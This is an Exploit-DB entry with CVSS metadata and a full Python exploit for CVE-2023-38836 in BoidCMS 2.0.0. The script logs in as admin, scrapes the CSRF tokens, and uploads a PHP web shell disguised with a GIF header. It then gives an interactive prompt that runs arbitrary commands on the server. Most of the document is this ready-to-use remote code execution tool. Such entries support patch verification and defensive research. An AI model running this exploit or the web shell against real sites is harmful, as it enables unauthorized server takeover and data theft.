exploitdb | 1337kid | EDB-ID: 51741
Oct 09, 2023 - 12:00 a.m.

BoidCMS v2.0.0 - authenticated file upload vulnerability

2023-10-09 00:00:00
1337kid
www.exploit-db.com
exploit
boidcms
file upload
vulnerability
authenticated
cve-2023-38836
python
ubuntu
command injection

CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score: 9 High (Confidence: High)

EPSS: 0.673 Medium (Percentile: 98.0%)

#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836

import requests
import re
import argparse

parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url = args.url
user = args.user
passwd = args.passwd

def showhelp():
    # print_help() writes to stdout itself; wrapping it in print() printed "None"
    parser.print_help()
    exit()

if base_url is None or user is None or passwd is None:
    showhelp()

def get_token(html):
    # The admin pages embed a 64-character hex CSRF token. re.findall returns a
    # list, so take the first match instead of sending the whole list as the field.
    tokens = re.findall('[a-z0-9]{64}', html)
    if not tokens:
        print("CSRF token not found")
        exit()
    return tokens[0]

with requests.Session() as s:
    # Log in with the admin credentials; the upload page is only reachable authenticated
    req = s.get(f'{base_url}/admin')
    form_login_data = {
        "username": user,
        "password": passwd,
        "login": "Login",
        "token": get_token(req.text),
    }
    s.post(f'{base_url}/admin', data=form_login_data)
    #=========== File upload to RCE
    req = s.get(f'{base_url}/admin?page=media')
    form_upld_data = {
        "token": get_token(req.text),
        "upload": "Upload"
    }
    #==== php shell
    php_code = ['GIF89a;\n', '<?php system($_GET["cmd"]) ?>']
    with open('shell.php', 'w') as f:
        f.writelines(php_code)
    #====
    # Open the file in a with-block so the handle is closed after the request
    with open('shell.php', 'rb') as f:
        s.post(f'{base_url}/admin?page=media', files={'file': f}, data=form_upld_data)
    req = s.get(f'{base_url}/media/shell.php')
    # status_code is an int; comparing it with the string '404' never matched
    if req.status_code == 404:
        print("Upload failed")
        exit()
    print(f'Shell uploaded to "{base_url}/media/shell.php"')
    while True:
        cmd = input("cmd >> ")
        if cmd == 'exit':
            exit()
        req = s.get(f'{base_url}/media/shell.php', params={"cmd": cmd})
        print(req.text)
